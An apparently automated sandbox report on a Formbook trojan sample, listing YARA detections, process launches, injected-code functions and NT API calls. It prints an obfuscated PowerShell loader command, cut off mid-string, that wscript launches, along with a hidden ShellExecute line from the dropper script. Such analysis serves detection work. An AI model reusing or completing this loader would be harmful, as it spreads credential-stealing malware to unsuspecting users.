ozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
      Source: chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteV
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteVJump to behavior
      Potential malicious VBS script found (suspicious strings)
      Source: Initial file: Ller.ShellExecute Corinnas, " " & chrw(34) + S8 + chrw(34), "", "", 0
      Very long command line found
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 20624
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6696
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 20624Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6696Jump to behavior
      Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4496 -s 284
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF7127221_2_0AF71272
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF72C6221_2_0AF72C62
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF72C5621_2_0AF72C56
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF70C5221_2_0AF70C52
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF7524221_2_0AF75242
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF75E4221_2_0AF75E42
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF75E3D21_2_0AF75E3D
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF761E221_2_0AF761E2
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF777E221_2_0AF777E2
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF73FA221_2_0AF73FA2
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF75D2221_2_0AF75D22
      Source: C:\Windows\explorer.exeCode function: 21_2_0AF76F2921_2_0AF76F29
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7C7E221_2_0DE7C7E2
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7B1E221_2_0DE7B1E2
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE78FA221_2_0DE78FA2
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7AD2221_2_0DE7AD22
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7BF2921_2_0DE7BF29
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE77C6221_2_0DE77C62
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7627221_2_0DE76272
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7A24221_2_0DE7A242
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7AE4221_2_0DE7AE42
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE77C5621_2_0DE77C56
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE75C5221_2_0DE75C52
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7AE3D21_2_0DE7AE3D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059175C622_2_059175C6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591F5C922_2_0591F5C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592A52622_2_0592A526
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CD48022_2_058CD480
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586044522_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591675722_2_05916757
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586276022_2_05862760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586A76022_2_0586A760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586068022_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591A6C022_2_0591A6C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D36EC22_2_058D36EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585C6E022_2_0585C6E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591F6F622_2_0591F6F6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587C60022_2_0587C600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FD62C22_2_058FD62C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590D64622_2_0590D646
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588467022_2_05884670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058651C022_2_058651C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E022_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F11322_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592010E22_2_0592010E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FD13022_2_058FD130
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058A717A22_2_058A717A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0589508C22_2_0589508C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058500A022_2_058500A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586B0D022_2_0586B0D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059170F122_2_059170F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590E07622_2_0590E076
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585138022_2_05851380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586E31022_2_0586E310
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591F33022_2_0591F330
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584D2EC22_2_0584D2EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0582224522_2_05822245
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591124C22_2_0591124C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872DB022_2_05872DB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05869DD022_2_05869DD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FFDF422_2_058FFDF4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585AD0022_2_0585AD00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591FD2722_2_0591FD27
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05917D4C22_2_05917D4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860D6922_2_05860D69
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058F9C9822_2_058F9C98
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05878CDF22_2_05878CDF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587FCE022_2_0587FCE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592ACEB22_2_0592ACEB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05850C1222_2_05850C12
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586AC2022_2_0586AC20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590EC4C22_2_0590EC4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05863C6022_2_05863C60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591EC6022_2_0591EC60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05916C6922_2_05916C69
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591EFBF22_2_0591EFBF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05911FC622_2_05911FC6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05866FE022_2_05866FE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586CF0022_2_0586CF00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591FF6322_2_0591FF63
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05861EB222_2_05861EB2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05910EAD22_2_05910EAD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05919ED222_2_05919ED2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05852EE822_2_05852EE8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058A2E4822_2_058A2E48
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05880E5022_2_05880E50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05900E6D22_2_05900E6D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585E9A022_2_0585E9A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591E9A622_2_0591E9A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058A59C022_2_058A59C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058299E822_2_058299E8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587688222_2_05876882
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D98B222_2_058D98B2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058628C022_2_058628C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059118DA22_2_059118DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059178F322_2_059178F3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586380022_2_05863800
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588E81022_2_0588E810
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590083522_2_05900835
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591F87222_2_0591F872
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584686822_2_05846868
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586987022_2_05869870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B87022_2_0587B870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D4BC022_2_058D4BC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0589DB1922_2_0589DB19
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860B1022_2_05860B10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591FB2E22_2_0591FB2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591FA8922_2_0591FA89
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587FAA022_2_0587FAA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591CA1322_2_0591CA13
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591EA5B22_2_0591EA5B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05018D6022_2_05018D60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0501A1E022_2_0501A1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 058DEF10 appears 105 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05895050 appears 36 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 058A7BE4 appears 89 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0584B910 appears 268 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 058CE692 appears 86 times
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7C7E2 NtCreateFile,21_2_0DE7C7E2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058934E0 NtCreateMutant,LdrInitializeThunk,22_2_058934E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,22_2_05892DC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892D10 NtQuerySystemInformation,LdrInitializeThunk,22_2_05892D10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892CF0 NtDelayExecution,LdrInitializeThunk,22_2_05892CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892C30 NtMapViewOfSection,LdrInitializeThunk,22_2_05892C30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892FB0 NtSetValueKey,LdrInitializeThunk,22_2_05892FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892F00 NtCreateFile,LdrInitializeThunk,22_2_05892F00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892E50 NtCreateSection,LdrInitializeThunk,22_2_05892E50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058929F0 NtReadFile,LdrInitializeThunk,22_2_058929F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892B80 NtCreateKey,LdrInitializeThunk,22_2_05892B80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892B90 NtFreeVirtualMemory,LdrInitializeThunk,22_2_05892B90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892BC0 NtQueryInformationToken,LdrInitializeThunk,22_2_05892BC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892B00 NtQueryValueKey,LdrInitializeThunk,22_2_05892B00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892B10 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_05892B10
